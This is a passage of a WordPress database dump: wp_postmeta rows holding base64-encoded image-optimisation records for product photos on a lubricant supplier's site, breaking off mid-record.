INSERT INTO `wp_postmeta` VALUES (28971, 1930, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEuanBnIiwid2lkdGgiOjQ3MjYsImhlaWdodCI6Mjk4NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTE1NCwiaWQiOiIxOTMwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU4NywidGltZSI6MTQ4MzU1MTE1OCwiaWQiOjE5MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS04MDB4NTA1LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTA1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtODAweDUwNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTgwMHg1MDUuanBnIiwicmVkdWN0aW9uIjoxMDEzLCJ0aW1lIjoxNDgzNTUxMTYyLCJpZCI6MTkzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTc2OHg0ODUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS03Njh4NDg1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtNzY4eDQ4NS5qcGciLCJyZWR1Y3Rpb24iOjg5NCwidGltZSI6MTQ4MzU1MTE2NiwiaWQiOjE5MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0xNjAweDEwMTAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTAxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTE2MDB4MTAxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTE2MDB4MTAxMC5qcGciLCJyZWR1Y3Rpb24iOjI4OTcsInRpbWUiOjE0ODM1NTExNzAsImlkIjoxOTMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTUxMTc0LCJpZCI6MTkzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2MiwidGltZSI6MTQ4MzU1MTE3NywiaWQiOjE5MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0OTcsInRpbWUiOjE0ODM1NTExODAsImlkIjoxOTMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODg3LCJ0aW1lIjoxNDgzNTUxMTg0LCJpZCI6MTkzMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NzYzLCJ0aW1lIjoxNDgzNTUxMTg4LCJpZCI6MTkzMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTEtNDUweDI4NC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xLTQ1MHgyODQuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIyODQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMS00NTB4Mjg0LmpwZyIsInJlZHVjdGlvbiI6OTAxLCJ0aW1lIjoxNDgzNTUxMTkxLCJpZCI6MTkzMH1d'); 
INSERT INTO `wp_postmeta` VALUES (28972, 1929, 'wpfc_optimisation_reduction', '1382197'); 
INSERT INTO `wp_postmeta` VALUES (28973, 1929, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEuanBnIiwid2lkdGgiOjIyMjIsImhlaWdodCI6MTY2NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEuanBnIiwicmVkdWN0aW9uIjoxMzgyMTg3LCJ0aW1lIjoxNDgzNTUxMjAxLCJpZCI6IjE5MjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTIwNCwiaWQiOjE5Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS04MDB4NjAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtODAweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTgwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMjA3LCJpZCI6MTkyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTc2OHg1NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS03Njh4NTc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtNzY4eDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEyMTAsImlkIjoxOTI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMTYwMHgxMjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0xNjAweDEyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0xNjAweDEyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMjE0LCJpZCI6MTkyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEyMTcsImlkIjoxOTI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTIxOSwiaWQiOjE5Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMjIxLCJpZCI6MTkyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTEyMjQsImlkIjoxOTI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUxMjI2LCJpZCI6MTkyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMTI4LTEtNDUweDMzNy5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0xLTQ1MHgzMzcuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMzciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMS00NTB4MzM3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MTIyOSwiaWQiOjE5Mjl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28974, 1928, 'wpfc_optimisation_reduction', '14621'); 
INSERT INTO `wp_postmeta` VALUES (28975, 1928, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MTIzNCwiaWQiOiIxOTI4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU1MTIzNywiaWQiOjE5Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNTMxLCJ0aW1lIjoxNDgzNTUxMjQxLCJpZCI6MTkyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0MTEsInRpbWUiOjE0ODM1NTEyNDUsImlkIjoxOTI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG